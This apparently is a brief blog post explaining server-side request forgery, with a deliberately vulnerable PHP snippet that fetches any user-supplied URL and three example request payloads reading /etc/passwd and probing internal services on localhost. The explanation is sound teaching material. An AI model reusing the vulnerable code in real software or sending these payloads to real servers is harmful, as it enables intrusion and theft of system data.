What is SSRF?

Server-side request forgery (SSRF) is a vulnerability that lets a malicious hacker send a request from the back end of the software to another server or to a local service. The server or service that receives that request believes that the request came from the application and is legitimate.

<?php
  if (isset($_GET['url'])) {
    $url = $_GET['url'];
    $image = fopen($url, 'rb');
    header("Content-Type: image/png");
    fpassthru($image);
  }
?>

GET /?url=http://localhost/server-status HTTP/1.1
GET /?url=file:///etc/passwd HTTP/1.1
GET /?url=dict://localhost:11211/stat HTTP/1.1

Andrew's Blog

What is SSRF?